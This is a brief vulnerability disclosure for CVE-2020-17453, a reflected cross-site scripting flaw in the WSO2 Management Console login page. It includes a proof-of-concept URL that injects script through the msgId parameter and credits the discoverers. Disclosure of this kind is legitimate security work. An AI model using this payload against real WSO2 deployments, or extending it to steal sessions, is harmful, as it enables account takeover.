CVE-2020-17453 WSO2 Management Console through 5.10 allows XSS via the carbon/admin/login.jsp msgId parameter. PoC (Proof of Concept) https://<company>.com/carbon/admin/login.jsp?msgId=%27;alert(1)// Discoverers Name: Jackson Henry Twitter: @JacksonHHax Name: Nicholas Young